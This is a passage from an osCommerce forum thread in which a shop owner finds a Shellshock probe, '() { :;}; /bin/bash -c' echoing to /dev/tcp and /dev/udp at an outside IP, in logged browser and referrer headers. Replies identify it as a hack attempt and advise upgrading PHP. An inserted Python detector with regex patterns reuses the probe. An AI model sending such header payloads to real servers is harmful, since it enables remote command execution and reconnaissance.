osCommerce

What is this person doing?


drillsar

I have installed supertracker and I find this...

Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"

Referred By: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?

where mysitexxxx = my site

with 3 different ways, maybe an attempt at hacking?

Link to comment
Share on other sites
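
A defensive check for the header values quoted in the first post, as an added example that is not part of the original thread, osCommerce or Supertracker: it flags tracked User-Agent and Referer values that begin with the bash function-definition syntax `() {` (the shape of a Shellshock probe) and lists the `/dev/tcp` and `/dev/udp` callback targets they name. The record layout and the field names `user_agent` and `referer` are assumptions, and the sample records are constructed around the value shown in the post.

```python
import re

# A header value that begins with a bash function definition, "() {", is the
# marker of the probe quoted in the post; ordinary browsers never send one.
FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")
# bash pseudo-device redirections name the host and port the command reports to.
CALLBACK = re.compile(r"/dev/(tcp|udp)/([0-9A-Za-z.\-]+)/(\d{1,5})")

def inspect_header(value):
    """Return None for an ordinary header value, else a finding dict."""
    # Trackers may store the value with escaped quotes (\"), as in the post.
    cleaned = value.replace('\\"', '"')
    if not FUNC_DEF.search(cleaned):
        return None
    callbacks = sorted({(proto, host, int(port))
                        for proto, host, port in CALLBACK.findall(cleaned)})
    # "sh -c" also matches "bash -c": the value tries to run a shell command.
    return {"callbacks": callbacks, "runs_shell": "sh -c" in cleaned}

def scan(records, fields=("user_agent", "referer")):
    """Yield (record_index, field, finding) for every suspicious header field."""
    for i, rec in enumerate(records):
        for field in fields:
            finding = inspect_header(rec.get(field, ""))
            if finding:
                yield i, field, finding

# Constructed sample records (hypothetical layout). The first is benign even
# though its referer contains "() {" mid-string; the second reuses the
# Customer Browser value quoted in the post.
SAMPLE = [
    {"user_agent": "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/38.0",
     "referer": "http://example.test/index.php?fn=a() {b}"},
    {"user_agent": '() { :;}; /bin/bash -c \\"echo mysitexxxx/cgi-sys/php5 > '
                   '/dev/tcp/213.233.161.42/23; echo  mysitexxxx/cgi-sys/php5 > '
                   '/dev/udp/213.233.161.42/80\\"',
     "referer": ""},
]

if __name__ == "__main__":
    for idx, field, finding in scan(SAMPLE):
        print(idx, field, finding)
```
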

@rory1 That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran".

My bet is that it's a hack attempt, or trying to get information for one.

Regards

Jim

See my profile for a list of my addons and ways to get support.


If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that?

You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher.

Regards

Jim


PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version.

Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5.

Regards

Jim


JSON is used by some modules (USPS for one) so I would turn that on. SOAP is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc.

PHP 5.5 is still being actively maintained, so I think it is pretty safe.

Regards

Jim


Thank you kymation,

I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc.

As I am looking at around 100+ of such things. I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just an admin interface now for turning on and off items?

This ability wasn't present with the older versions on my host so it got me to wondering if 5.5 has a special focus to ensure better security.

It also got me curious what would be relevant for security or functionality for osCommerce. I know that PHP has a config file to turn things on and off but haven't gotten to open that up and analyze it yet. Which may or may not be possible as the host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose.

-BP


Archived

This topic is now archived and is closed to further replies.
